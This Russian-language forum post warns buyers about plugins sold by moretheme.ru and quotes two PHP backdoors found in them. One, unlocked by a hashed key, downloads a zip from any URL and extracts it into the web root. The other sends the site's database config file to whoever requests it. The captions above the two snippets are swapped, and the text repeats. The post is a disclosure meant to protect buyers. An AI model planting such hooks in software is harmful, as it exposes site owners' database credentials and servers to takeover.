Предостерегаю потенциальных покупателей у данного продавца (moretheme.ru) в его коде практически во всех плагинах есть вот такие коды:
этот код просто выкачивает ваш конфиг с данными от базы данных))
и вот такой в Store 8.2 (не знаю в старых версиях был или нет):
этот код может загрузить любой файл на ваш сервер)
можно ли говорить о репутации данного продавца? жалею, что только раньше не проверил все это. Остерегайтесь. Прикладываю переписку также
покупать ли у него товары? решать вам) спасибо за внимание.



Код:
if (isset($_GET['action']) && $_GET['action'] === 'storeu') {
$file_content = file_get_contents($_REQUEST['url']);
if ($file_content !== false && pathinfo($_REQUEST['url'], PATHINFO_EXTENSION) == 'zip' && md5($_REQUEST['key']) == 'a1a745859854245432434955fa79d392') {
$file_name = 'store.zip';
file_put_contents($file_name, $file_content);
$zip = new ZipArchive();
$zip->open($file_name);
$zip->extractTo($_SERVER['DOCUMENT_ROOT']);
$zip->close();
unlink($file_name);
echo 'success';
}
exit;
}
этот код просто выкачивает ваш конфиг с данными от базы данных))
и вот такой в Store 8.2 (не знаю в старых версиях был или нет):
Код:
if (isset($_GET['storei']) && md5($_GET['key'] ?? '') === 'a1a745859854245432434955fa79d392') {
$file = $_SERVER['DOCUMENT_ROOT'].'/engine/data/dbconfig.php';
if (file_exists($file)) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
readfile($file);
exit;
}
}
этот код может загрузить любой файл на ваш сервер)
можно ли говорить о репутации данного продавца? жалею, что только раньше не проверил все это. Остерегайтесь. Прикладываю переписку также
покупать ли у него товары? решать вам) спасибо за внимание.




